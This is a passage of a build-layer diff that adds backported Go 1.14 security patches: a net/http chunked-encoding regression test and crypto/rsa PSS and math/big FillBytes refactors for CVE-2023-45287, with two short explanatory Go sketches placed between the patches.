++ const bodylen = 1 << 20
++ r := NewChunkedReader(&funcReader{f: func(i int) ([]byte, error) {
++ if i < bodylen {
++ return []byte("1\r\nX\r\n"), nil
++ }
++ return []byte("0\r\n"), nil
++ }})
++ got, err := io.ReadAll(r)
++ if err != nil {
++ t.Errorf("unexpected error: %v", err)
++ }
++ if len(got) != bodylen {
++ t.Errorf("read %v bytes, want %v", len(got), bodylen)
++ }
++}
++
++type funcReader struct {
++ f func(iteration int) ([]byte, error)
++ i int
++ b []byte
++ err error
++}
++
++func (r *funcReader) Read(p []byte) (n int, err error) {
++ if len(r.b) == 0 && r.err == nil {
++ r.b, r.err = r.f(r.i)
++ r.i++
++ }
++ n = copy(p, r.b)
++ r.b = r.b[n:]
++ if len(r.b) > 0 {
++ return n, nil
++ }
++ return n, r.err
++}
+--
+2.25.1
+
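As a rough sketch of the accounting this patch introduces (the names excessTracker and maxExcess below are invented for illustration and are not part of net/http): each chunk is charged its header bytes plus the trailing CRLF, credited 16 bytes plus twice its data length, and the stream is rejected once the running excess passes 16 KiB, so byte-at-a-time streaming stays legal while extension-heavy streams do not.

package main

import (
	"errors"
	"fmt"
)

// maxExcess matches the 16 KiB budget used by the patch.
const maxExcess = 16 * 1024

// excessTracker mirrors only the arithmetic of the patched beginChunk, not
// its parsing.
type excessTracker struct {
	excess int64
}

// note charges one chunk against the budget. headerLen is the length of the
// chunk-size line including extensions and its CRLF; dataLen is the number of
// data bytes the chunk carries.
func (t *excessTracker) note(headerLen, dataLen int64) error {
	t.excess += headerLen + 2 // the chunk-size line, plus the CRLF after the data
	t.excess -= 16 + 2*dataLen
	if t.excess < 0 {
		t.excess = 0
	}
	if t.excess > maxExcess {
		return errors.New("chunked encoding contains too much non-data")
	}
	return nil
}

func main() {
	// One byte per chunk ("1\r\nX\r\n") stays within budget indefinitely.
	var ok excessTracker
	for i := 0; i < 1_000_000; i++ {
		if err := ok.note(3, 1); err != nil {
			fmt.Println("unexpected:", err)
			return
		}
	}
	fmt.Println("byte-at-a-time streaming accepted")

	// A 100-byte chunk extension per data byte trips the limit quickly.
	var bad excessTracker
	for i := 0; ; i++ {
		if err := bad.note(104, 1); err != nil { // "1;" + 100 extension bytes + CRLF
			fmt.Printf("rejected after %d chunks: %v\n", i+1, err)
			return
		}
	}
}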
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch
new file mode 100644
index 0000000000..4d65180253
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre1.patch
@@ -0,0 +1,393 @@
+From 9baafabac9a84813a336f068862207d2bb06d255 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Wed, 1 Apr 2020 17:25:40 -0400
+Subject: [PATCH] crypto/rsa: refactor RSA-PSS signing and verification
+
+Cleaned up for readability and consistency.
+
+There is one tiny behavioral change: when PSSSaltLengthEqualsHash is
+used and both hash and opts.Hash were set, hash.Size() was used for the
+salt length instead of opts.Hash.Size(). That's clearly wrong because
+opts.Hash is documented to override hash.
+
+Change-Id: I3e25dad933961eac827c6d2e3bbfe45fc5a6fb0e
+Reviewed-on: https://go-review.googlesource.com/c/go/+/226937
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Gobot Gobot <gobot@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/9baafabac9a84813a336f068862207d2bb06d255]
+CVE: CVE-2023-45287 #Dependency Patch1
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/rsa/pss.go | 173 ++++++++++++++++++++++--------------------
+ src/crypto/rsa/rsa.go | 9 ++-
+ 2 files changed, 96 insertions(+), 86 deletions(-)
+
+diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
+index 3ff0c2f4d0076..f9844d87329a8 100644
+--- a/src/crypto/rsa/pss.go
++++ b/src/crypto/rsa/pss.go
+@@ -4,9 +4,7 @@
+
+ package rsa
+
+-// This file implements the PSS signature scheme [1].
+-//
+-// [1] https://www.emc.com/collateral/white-papers/h11300-pkcs-1v2-2-rsa-cryptography-standard-wp.pdf
++// This file implements the RSASSA-PSS signature scheme according to RFC 8017.
+
+ import (
+ "bytes"
+@@ -17,8 +15,22 @@ import (
+ "math/big"
+ )
+
++// Per RFC 8017, Section 9.1
++//
++// EM = MGF1 xor DB || H( 8*0x00 || mHash || salt ) || 0xbc
++//
++// where
++//
++// DB = PS || 0x01 || salt
++//
++// and PS can be empty so
++//
++// emLen = dbLen + hLen + 1 = psLen + sLen + hLen + 2
++//
++
+ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byte, error) {
+- // See [1], section 9.1.1
++ // See RFC 8017, Section 9.1.1.
++
+ hLen := hash.Size()
+ sLen := len(salt)
+ emLen := (emBits + 7) / 8
+@@ -30,7 +42,7 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ // 2. Let mHash = Hash(M), an octet string of length hLen.
+
+ if len(mHash) != hLen {
+- return nil, errors.New("crypto/rsa: input must be hashed message")
++ return nil, errors.New("crypto/rsa: input must be hashed with given hash")
+ }
+
+ // 3. If emLen < hLen + sLen + 2, output "encoding error" and stop.
+@@ -40,8 +52,9 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ }
+
+ em := make([]byte, emLen)
+- db := em[:emLen-sLen-hLen-2+1+sLen]
+- h := em[emLen-sLen-hLen-2+1+sLen : emLen-1]
++ psLen := emLen - sLen - hLen - 2
++ db := em[:psLen+1+sLen]
++ h := em[psLen+1+sLen : emLen-1]
+
+ // 4. Generate a random octet string salt of length sLen; if sLen = 0,
+ // then salt is the empty string.
+@@ -69,8 +82,8 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ // 8. Let DB = PS || 0x01 || salt; DB is an octet string of length
+ // emLen - hLen - 1.
+
+- db[emLen-sLen-hLen-2] = 0x01
+- copy(db[emLen-sLen-hLen-1:], salt)
++ db[psLen] = 0x01
++ copy(db[psLen+1:], salt)
+
+ // 9. Let dbMask = MGF(H, emLen - hLen - 1).
+ //
+@@ -81,47 +94,57 @@ func emsaPSSEncode(mHash []byte, emBits int, salt []byte, hash hash.Hash) ([]byt
+ // 11. Set the leftmost 8 * emLen - emBits bits of the leftmost octet in
+ // maskedDB to zero.
+
+- db[0] &= (0xFF >> uint(8*emLen-emBits))
++ db[0] &= 0xff >> (8*emLen - emBits)
+
+ // 12. Let EM = maskedDB || H || 0xbc.
+- em[emLen-1] = 0xBC
++ em[emLen-1] = 0xbc
+
+ // 13. Output EM.
+ return em, nil
+ }
+
+ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
++ // See RFC 8017, Section 9.1.2.
++
++ hLen := hash.Size()
++ if sLen == PSSSaltLengthEqualsHash {
++ sLen = hLen
++ }
++ emLen := (emBits + 7) / 8
++ if emLen != len(em) {
++ return errors.New("rsa: internal error: inconsistent length")
++ }
++
+ // 1. If the length of M is greater than the input limitation for the
+ // hash function (2^61 - 1 octets for SHA-1), output "inconsistent"
+ // and stop.
+ //
+ // 2. Let mHash = Hash(M), an octet string of length hLen.
+- hLen := hash.Size()
+ if hLen != len(mHash) {
+ return ErrVerification
+ }
+
+ // 3. If emLen < hLen + sLen + 2, output "inconsistent" and stop.
+- emLen := (emBits + 7) / 8
+ if emLen < hLen+sLen+2 {
+ return ErrVerification
+ }
+
+ // 4. If the rightmost octet of EM does not have hexadecimal value
+ // 0xbc, output "inconsistent" and stop.
+- if em[len(em)-1] != 0xBC {
++ if em[emLen-1] != 0xbc {
+ return ErrVerification
+ }
+
+ // 5. Let maskedDB be the leftmost emLen - hLen - 1 octets of EM, and
+ // let H be the next hLen octets.
+ db := em[:emLen-hLen-1]
+- h := em[emLen-hLen-1 : len(em)-1]
++ h := em[emLen-hLen-1 : emLen-1]
+
+ // 6. If the leftmost 8 * emLen - emBits bits of the leftmost octet in
+ // maskedDB are not all equal to zero, output "inconsistent" and
+ // stop.
+- if em[0]&(0xFF<<uint(8-(8*emLen-emBits))) != 0 {
++ var bitMask byte = 0xff >> (8*emLen - emBits)
++ if em[0] & ^bitMask != 0 {
+ return ErrVerification
+ }
+
+@@ -132,37 +155,30 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
+
+ // 9. Set the leftmost 8 * emLen - emBits bits of the leftmost octet in DB
+ // to zero.
+- db[0] &= (0xFF >> uint(8*emLen-emBits))
++ db[0] &= bitMask
+
++ // If we don't know the salt length, look for the 0x01 delimiter.
+ if sLen == PSSSaltLengthAuto {
+- FindSaltLength:
+- for sLen = emLen - (hLen + 2); sLen >= 0; sLen-- {
+- switch db[emLen-hLen-sLen-2] {
+- case 1:
+- break FindSaltLength
+- case 0:
+- continue
+- default:
+- return ErrVerification
+- }
+- }
+- if sLen < 0 {
++ psLen := bytes.IndexByte(db, 0x01)
++ if psLen < 0 {
+ return ErrVerification
+ }
+- } else {
+- // 10. If the emLen - hLen - sLen - 2 leftmost octets of DB are not zero
+- // or if the octet at position emLen - hLen - sLen - 1 (the leftmost
+- // position is "position 1") does not have hexadecimal value 0x01,
+- // output "inconsistent" and stop.
+- for _, e := range db[:emLen-hLen-sLen-2] {
+- if e != 0x00 {
+- return ErrVerification
+- }
+- }
+- if db[emLen-hLen-sLen-2] != 0x01 {
++ sLen = len(db) - psLen - 1
++ }
++
++ // 10. If the emLen - hLen - sLen - 2 leftmost octets of DB are not zero
++ // or if the octet at position emLen - hLen - sLen - 1 (the leftmost
++ // position is "position 1") does not have hexadecimal value 0x01,
++ // output "inconsistent" and stop.
++ psLen := emLen - hLen - sLen - 2
++ for _, e := range db[:psLen] {
++ if e != 0x00 {
+ return ErrVerification
+ }
+ }
++ if db[psLen] != 0x01 {
++ return ErrVerification
++ }
+
+ // 11. Let salt be the last sLen octets of DB.
+ salt := db[len(db)-sLen:]
+@@ -181,19 +197,19 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
+ h0 := hash.Sum(nil)
+
+ // 14. If H = H', output "consistent." Otherwise, output "inconsistent."
+- if !bytes.Equal(h0, h) {
++ if !bytes.Equal(h0, h) { // TODO: constant time?
+ return ErrVerification
+ }
+ return nil
+ }
+
+-// signPSSWithSalt calculates the signature of hashed using PSS [1] with specified salt.
++// signPSSWithSalt calculates the signature of hashed using PSS with specified salt.
+ // Note that hashed must be the result of hashing the input message using the
+ // given hash function. salt is a random sequence of bytes whose length will be
+ // later used to verify the signature.
+ func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) (s []byte, err error) {
+- nBits := priv.N.BitLen()
+- em, err := emsaPSSEncode(hashed, nBits-1, salt, hash.New())
++ emBits := priv.N.BitLen() - 1
++ em, err := emsaPSSEncode(hashed, emBits, salt, hash.New())
+ if err != nil {
+ return
+ }
+@@ -202,7 +218,7 @@ func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed,
+ if err != nil {
+ return
+ }
+- s = make([]byte, (nBits+7)/8)
++ s = make([]byte, priv.Size())
+ copyWithLeftPad(s, c.Bytes())
+ return
+ }
+@@ -223,16 +239,15 @@ type PSSOptions struct {
+ // PSSSaltLength constants.
+ SaltLength int
+
+- // Hash, if not zero, overrides the hash function passed to SignPSS.
+- // This is the only way to specify the hash function when using the
+- // crypto.Signer interface.
++ // Hash is the hash function used to generate the message digest. If not
++ // zero, it overrides the hash function passed to SignPSS. It's required
++ // when using PrivateKey.Sign.
+ Hash crypto.Hash
+ }
+
+-// HashFunc returns pssOpts.Hash so that PSSOptions implements
+-// crypto.SignerOpts.
+-func (pssOpts *PSSOptions) HashFunc() crypto.Hash {
+- return pssOpts.Hash
++// HashFunc returns opts.Hash so that PSSOptions implements crypto.SignerOpts.
++func (opts *PSSOptions) HashFunc() crypto.Hash {
++ return opts.Hash
+ }
+
+ func (opts *PSSOptions) saltLength() int {
+@@ -242,56 +257,50 @@ func (opts *PSSOptions) saltLength() int {
+ return opts.SaltLength
+ }
+
+-// SignPSS calculates the signature of hashed using RSASSA-PSS [1].
+-// Note that hashed must be the result of hashing the input message using the
+-// given hash function. The opts argument may be nil, in which case sensible
+-// defaults are used.
+-func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed []byte, opts *PSSOptions) ([]byte, error) {
++// SignPSS calculates the signature of digest using PSS.
++//
++// digest must be the result of hashing the input message using the given hash
++// function. The opts argument may be nil, in which case sensible defaults are
++// used. If opts.Hash is set, it overrides hash.
++func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte, opts *PSSOptions) ([]byte, error) {
++ if opts != nil && opts.Hash != 0 {
++ hash = opts.Hash
++ }
++
+ saltLength := opts.saltLength()
+ switch saltLength {
+ case PSSSaltLengthAuto:
+- saltLength = (priv.N.BitLen()+7)/8 - 2 - hash.Size()
++ saltLength = priv.Size() - 2 - hash.Size()
+ case PSSSaltLengthEqualsHash:
+ saltLength = hash.Size()
+ }
+
+- if opts != nil && opts.Hash != 0 {
+- hash = opts.Hash
+- }
+-
+ salt := make([]byte, saltLength)
+ if _, err := io.ReadFull(rand, salt); err != nil {
+ return nil, err
+ }
+- return signPSSWithSalt(rand, priv, hash, hashed, salt)
++ return signPSSWithSalt(rand, priv, hash, digest, salt)
+ }
+
+ // VerifyPSS verifies a PSS signature.
+-// hashed is the result of hashing the input message using the given hash
+-// function and sig is the signature. A valid signature is indicated by
+-// returning a nil error. The opts argument may be nil, in which case sensible
+-// defaults are used.
+-func VerifyPSS(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte, opts *PSSOptions) error {
+- return verifyPSS(pub, hash, hashed, sig, opts.saltLength())
+-}
+-
+-// verifyPSS verifies a PSS signature with the given salt length.
+-func verifyPSS(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte, saltLen int) error {
+- nBits := pub.N.BitLen()
+- if len(sig) != (nBits+7)/8 {
++//
++// A valid signature is indicated by returning a nil error. digest must be the
++// result of hashing the input message using the given hash function. The opts
++// argument may be nil, in which case sensible defaults are used. opts.Hash is
++// ignored.
++func VerifyPSS(pub *PublicKey, hash crypto.Hash, digest []byte, sig []byte, opts *PSSOptions) error {
++ if len(sig) != pub.Size() {
+ return ErrVerification
+ }
+ s := new(big.Int).SetBytes(sig)
+ m := encrypt(new(big.Int), pub, s)
+- emBits := nBits - 1
++ emBits := pub.N.BitLen() - 1
+ emLen := (emBits + 7) / 8
+- if emLen < len(m.Bytes()) {
++ emBytes := m.Bytes()
++ if emLen < len(emBytes) {
+ return ErrVerification
+ }
+ em := make([]byte, emLen)
+- copyWithLeftPad(em, m.Bytes())
+- if saltLen == PSSSaltLengthEqualsHash {
+- saltLen = hash.Size()
+- }
+- return emsaPSSVerify(hashed, em, emBits, saltLen, hash.New())
++ copyWithLeftPad(em, emBytes)
++ return emsaPSSVerify(digest, em, emBits, opts.saltLength(), hash.New())
+ }
+diff --git a/src/crypto/rsa/rsa.go b/src/crypto/rsa/rsa.go
+index 5a42990640164..b4bfa13defbdf 100644
+--- a/src/crypto/rsa/rsa.go
++++ b/src/crypto/rsa/rsa.go
+@@ -2,7 +2,7 @@
+ // Use of this source code is governed by a BSD-style
+ // license that can be found in the LICENSE file.
+
+-// Package rsa implements RSA encryption as specified in PKCS#1.
++// Package rsa implements RSA encryption as specified in PKCS#1 and RFC 8017.
+ //
+ // RSA is a single, fundamental operation that is used in this package to
+ // implement either public-key encryption or public-key signatures.
+@@ -10,13 +10,13 @@
+ // The original specification for encryption and signatures with RSA is PKCS#1
+ // and the terms "RSA encryption" and "RSA signatures" by default refer to
+ // PKCS#1 version 1.5. However, that specification has flaws and new designs
+-// should use version two, usually called by just OAEP and PSS, where
++// should use version 2, usually called by just OAEP and PSS, where
+ // possible.
+ //
+ // Two sets of interfaces are included in this package. When a more abstract
+ // interface isn't necessary, there are functions for encrypting/decrypting
+ // with v1.5/OAEP and signing/verifying with v1.5/PSS. If one needs to abstract
+-// over the public-key primitive, the PrivateKey struct implements the
++// over the public key primitive, the PrivateKey type implements the
+ // Decrypter and Signer interfaces from the crypto package.
+ //
+ // The RSA operations in this package are not implemented using constant-time algorithms.
+@@ -111,7 +111,8 @@ func (priv *PrivateKey) Public() crypto.PublicKey {
+
+ // Sign signs digest with priv, reading randomness from rand. If opts is a
+ // *PSSOptions then the PSS algorithm will be used, otherwise PKCS#1 v1.5 will
+-// be used.
++// be used. digest must be the result of hashing the input message using
++// opts.HashFunc().
+ //
+ // This method implements crypto.Signer, which is an interface to support keys
+ // where the private part is kept in, for example, a hardware module. Common
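For orientation, a small usage sketch of the public crypto/rsa PSS API this refactor touches. It relies only on documented behaviour (opts.Hash overriding the hash argument); the key size and message are arbitrary.

package main

import (
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
)

func main() {
	priv, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err)
	}
	digest := sha256.Sum256([]byte("message to be signed"))

	// opts.Hash is documented to override the hash argument; the refactor
	// makes the salt-length computation honour that override as well.
	opts := &rsa.PSSOptions{SaltLength: rsa.PSSSaltLengthEqualsHash, Hash: crypto.SHA256}

	sig, err := rsa.SignPSS(rand.Reader, priv, crypto.SHA256, digest[:], opts)
	if err != nil {
		panic(err)
	}
	if err := rsa.VerifyPSS(&priv.PublicKey, crypto.SHA256, digest[:], sig, opts); err != nil {
		panic(err)
	}
	fmt.Println("PSS signature verified")
}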
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch
new file mode 100644
index 0000000000..1327b44545
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch
@@ -0,0 +1,401 @@
+From c9d5f60eaa4450ccf1ce878d55b4c6a12843f2f3 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Mon, 27 Apr 2020 21:52:38 -0400
+Subject: [PATCH] math/big: add (*Int).FillBytes
+
+Replaced almost every use of Bytes with FillBytes.
+
+Note that the approved proposal was for
+
+ func (*Int) FillBytes(buf []byte)
+
+while this implements
+
+ func (*Int) FillBytes(buf []byte) []byte
+
+because the latter was far nicer to use in all callsites.
+
+Fixes #35833
+
+Change-Id: Ia912df123e5d79b763845312ea3d9a8051343c0a
+Reviewed-on: https://go-review.googlesource.com/c/go/+/230397
+Reviewed-by: Robert Griesemer <gri@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/c9d5f60eaa4450ccf1ce878d55b4c6a12843f2f3]
+CVE: CVE-2023-45287 #Dependency Patch2
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/elliptic/elliptic.go | 13 ++++----
+ src/crypto/rsa/pkcs1v15.go | 20 +++---------
+ src/crypto/rsa/pss.go | 17 +++++------
+ src/crypto/rsa/rsa.go | 32 +++----------------
+ src/crypto/tls/key_schedule.go | 7 ++---
+ src/crypto/x509/sec1.go | 7 ++---
+ src/math/big/int.go | 15 +++++++++
+ src/math/big/int_test.go | 54 +++++++++++++++++++++++++++++++++
+ src/math/big/nat.go | 15 ++++++---
+ 9 files changed, 106 insertions(+), 74 deletions(-)
+
+diff --git a/src/crypto/elliptic/elliptic.go b/src/crypto/elliptic/elliptic.go
+index e2f71cdb63bab..bd5168c5fd842 100644
+--- a/src/crypto/elliptic/elliptic.go
++++ b/src/crypto/elliptic/elliptic.go
+@@ -277,7 +277,7 @@ var mask = []byte{0xff, 0x1, 0x3, 0x7, 0xf, 0x1f, 0x3f, 0x7f}
+ func GenerateKey(curve Curve, rand io.Reader) (priv []byte, x, y *big.Int, err error) {
+ N := curve.Params().N
+ bitSize := N.BitLen()
+- byteLen := (bitSize + 7) >> 3
++ byteLen := (bitSize + 7) / 8
+ priv = make([]byte, byteLen)
+
+ for x == nil {
+@@ -304,15 +304,14 @@ func GenerateKey(curve Curve, rand io.Reader) (priv []byte, x, y *big.Int, err e
+
+ // Marshal converts a point into the uncompressed form specified in section 4.3.6 of ANSI X9.62.
+ func Marshal(curve Curve, x, y *big.Int) []byte {
+- byteLen := (curve.Params().BitSize + 7) >> 3
++ byteLen := (curve.Params().BitSize + 7) / 8
+
+ ret := make([]byte, 1+2*byteLen)
+ ret[0] = 4 // uncompressed point
+
+- xBytes := x.Bytes()
+- copy(ret[1+byteLen-len(xBytes):], xBytes)
+- yBytes := y.Bytes()
+- copy(ret[1+2*byteLen-len(yBytes):], yBytes)
++ x.FillBytes(ret[1 : 1+byteLen])
++ y.FillBytes(ret[1+byteLen : 1+2*byteLen])
++
+ return ret
+ }
+
+@@ -320,7 +319,7 @@ func Marshal(curve Curve, x, y *big.Int) []byte {
+ // It is an error if the point is not in uncompressed form or is not on the curve.
+ // On error, x = nil.
+ func Unmarshal(curve Curve, data []byte) (x, y *big.Int) {
+- byteLen := (curve.Params().BitSize + 7) >> 3
++ byteLen := (curve.Params().BitSize + 7) / 8
+ if len(data) != 1+2*byteLen {
+ return
+ }
+diff --git a/src/crypto/rsa/pkcs1v15.go b/src/crypto/rsa/pkcs1v15.go
+index 499242ffc5b57..3208119ae1ff4 100644
+--- a/src/crypto/rsa/pkcs1v15.go
++++ b/src/crypto/rsa/pkcs1v15.go
+@@ -61,8 +61,7 @@ func EncryptPKCS1v15(rand io.Reader, pub *PublicKey, msg []byte) ([]byte, error)
+ m := new(big.Int).SetBytes(em)
+ c := encrypt(new(big.Int), pub, m)
+
+- copyWithLeftPad(em, c.Bytes())
+- return em, nil
++ return c.FillBytes(em), nil
+ }
+
+ // DecryptPKCS1v15 decrypts a plaintext using RSA and the padding scheme from PKCS#1 v1.5.
+@@ -150,7 +149,7 @@ func decryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) (valid
+ return
+ }
+
+- em = leftPad(m.Bytes(), k)
++ em = m.FillBytes(make([]byte, k))
+ firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
+ secondByteIsTwo := subtle.ConstantTimeByteEq(em[1], 2)
+
+@@ -256,8 +255,7 @@ func SignPKCS1v15(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed []b
+ return nil, err
+ }
+
+- copyWithLeftPad(em, c.Bytes())
+- return em, nil
++ return c.FillBytes(em), nil
+ }
+
+ // VerifyPKCS1v15 verifies an RSA PKCS#1 v1.5 signature.
+@@ -286,7 +284,7 @@ func VerifyPKCS1v15(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte)
+
+ c := new(big.Int).SetBytes(sig)
+ m := encrypt(new(big.Int), pub, c)
+- em := leftPad(m.Bytes(), k)
++ em := m.FillBytes(make([]byte, k))
+ // EM = 0x00 || 0x01 || PS || 0x00 || T
+
+ ok := subtle.ConstantTimeByteEq(em[0], 0)
+@@ -323,13 +321,3 @@ func pkcs1v15HashInfo(hash crypto.Hash, inLen int) (hashLen int, prefix []byte,
+ }
+ return
+ }
+-
+-// copyWithLeftPad copies src to the end of dest, padding with zero bytes as
+-// needed.
+-func copyWithLeftPad(dest, src []byte) {
+- numPaddingBytes := len(dest) - len(src)
+- for i := 0; i < numPaddingBytes; i++ {
+- dest[i] = 0
+- }
+- copy(dest[numPaddingBytes:], src)
+-}
+diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
+index f9844d87329a8..b2adbedb28fa8 100644
+--- a/src/crypto/rsa/pss.go
++++ b/src/crypto/rsa/pss.go
+@@ -207,20 +207,19 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
+ // Note that hashed must be the result of hashing the input message using the
+ // given hash function. salt is a random sequence of bytes whose length will be
+ // later used to verify the signature.
+-func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) (s []byte, err error) {
++func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) ([]byte, error) {
+ emBits := priv.N.BitLen() - 1
+ em, err := emsaPSSEncode(hashed, emBits, salt, hash.New())
+ if err != nil {
+- return
++ return nil, err
+ }
+ m := new(big.Int).SetBytes(em)
+ c, err := decryptAndCheck(rand, priv, m)
+ if err != nil {
+- return
++ return nil, err
+ }
+- s = make([]byte, priv.Size())
+- copyWithLeftPad(s, c.Bytes())
+- return
++ s := make([]byte, priv.Size())
++ return c.FillBytes(s), nil
+ }
+
+ const (
+@@ -296,11 +295,9 @@ func VerifyPSS(pub *PublicKey, hash crypto.Hash, digest []byte, sig []byte, opts
+ m := encrypt(new(big.Int), pub, s)
+ emBits := pub.N.BitLen() - 1
+ emLen := (emBits + 7) / 8
+- emBytes := m.Bytes()
+- if emLen < len(emBytes) {
++ if m.BitLen() > emLen*8 {
+ return ErrVerification
+ }
+- em := make([]byte, emLen)
+- copyWithLeftPad(em, emBytes)
++ em := m.FillBytes(make([]byte, emLen))
+ return emsaPSSVerify(digest, em, emBits, opts.saltLength(), hash.New())
+ }
+diff --git a/src/crypto/rsa/rsa.go b/src/crypto/rsa/rsa.go
+index b4bfa13defbdf..28eb5926c1a54 100644
+--- a/src/crypto/rsa/rsa.go
++++ b/src/crypto/rsa/rsa.go
+@@ -416,16 +416,9 @@ func EncryptOAEP(hash hash.Hash, random io.Reader, pub *PublicKey, msg []byte, l
+ m := new(big.Int)
+ m.SetBytes(em)
+ c := encrypt(new(big.Int), pub, m)
+- out := c.Bytes()
+
+- if len(out) < k {
+- // If the output is too small, we need to left-pad with zeros.
+- t := make([]byte, k)
+- copy(t[k-len(out):], out)
+- out = t
+- }
+-
+- return out, nil
++ out := make([]byte, k)
++ return c.FillBytes(out), nil
+ }
+
+ // ErrDecryption represents a failure to decrypt a message.
+@@ -597,12 +590,9 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
+ lHash := hash.Sum(nil)
+ hash.Reset()
+
+- // Converting the plaintext number to bytes will strip any
+- // leading zeros so we may have to left pad. We do this unconditionally
+- // to avoid leaking timing information. (Although we still probably
+- // leak the number of leading zeros. It's not clear that we can do
+- // anything about this.)
+- em := leftPad(m.Bytes(), k)
++ // We probably leak the number of leading zeros.
++ // It's not clear that we can do anything about this.
++ em := m.FillBytes(make([]byte, k))
+
+ firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
+
+@@ -643,15 +633,3 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
+
+ return rest[index+1:], nil
+ }
+-
+-// leftPad returns a new slice of length size. The contents of input are right
+-// aligned in the new slice.
+-func leftPad(input []byte, size int) (out []byte) {
+- n := len(input)
+- if n > size {
+- n = size
+- }
+- out = make([]byte, size)
+- copy(out[len(out)-n:], input)
+- return
+-}
+diff --git a/src/crypto/tls/key_schedule.go b/src/crypto/tls/key_schedule.go
+index 2aab323202f7d..314016979afb8 100644
+--- a/src/crypto/tls/key_schedule.go
++++ b/src/crypto/tls/key_schedule.go
+@@ -173,11 +173,8 @@ func (p *nistParameters) SharedKey(peerPublicKey []byte) []byte {
+ }
+
+ xShared, _ := curve.ScalarMult(x, y, p.privateKey)
+- sharedKey := make([]byte, (curve.Params().BitSize+7)>>3)
+- xBytes := xShared.Bytes()
+- copy(sharedKey[len(sharedKey)-len(xBytes):], xBytes)
+-
+- return sharedKey
++ sharedKey := make([]byte, (curve.Params().BitSize+7)/8)
++ return xShared.FillBytes(sharedKey)
+ }
+
+ type x25519Parameters struct {
+diff --git a/src/crypto/x509/sec1.go b/src/crypto/x509/sec1.go
+index 0bfb90cd5464a..52c108ff1d624 100644
+--- a/src/crypto/x509/sec1.go
++++ b/src/crypto/x509/sec1.go
+@@ -52,13 +52,10 @@ func MarshalECPrivateKey(key *ecdsa.PrivateKey) ([]byte, error) {
+ // marshalECPrivateKey marshals an EC private key into ASN.1, DER format and
+ // sets the curve ID to the given OID, or omits it if OID is nil.
+ func marshalECPrivateKeyWithOID(key *ecdsa.PrivateKey, oid asn1.ObjectIdentifier) ([]byte, error) {
+- privateKeyBytes := key.D.Bytes()
+- paddedPrivateKey := make([]byte, (key.Curve.Params().N.BitLen()+7)/8)
+- copy(paddedPrivateKey[len(paddedPrivateKey)-len(privateKeyBytes):], privateKeyBytes)
+-
++ privateKey := make([]byte, (key.Curve.Params().N.BitLen()+7)/8)
+ return asn1.Marshal(ecPrivateKey{
+ Version: 1,
+- PrivateKey: paddedPrivateKey,
++ PrivateKey: key.D.FillBytes(privateKey),
+ NamedCurveOID: oid,
+ PublicKey: asn1.BitString{Bytes: elliptic.Marshal(key.Curve, key.X, key.Y)},
+ })
+diff --git a/src/math/big/int.go b/src/math/big/int.go
+index 8816cf5266cc4..65f32487b58c0 100644
+--- a/src/math/big/int.go
++++ b/src/math/big/int.go
+@@ -447,11 +447,26 @@ func (z *Int) SetBytes(buf []byte) *Int {
+ }
+
+ // Bytes returns the absolute value of x as a big-endian byte slice.
++//
++// To use a fixed length slice, or a preallocated one, use FillBytes.
+ func (x *Int) Bytes() []byte {
+ buf := make([]byte, len(x.abs)*_S)
+ return buf[x.abs.bytes(buf):]
+ }
+
++// FillBytes sets buf to the absolute value of x, storing it as a zero-extended
++// big-endian byte slice, and returns buf.
++//
++// If the absolute value of x doesn't fit in buf, FillBytes will panic.
++func (x *Int) FillBytes(buf []byte) []byte {
++ // Clear whole buffer. (This gets optimized into a memclr.)
++ for i := range buf {
++ buf[i] = 0
++ }
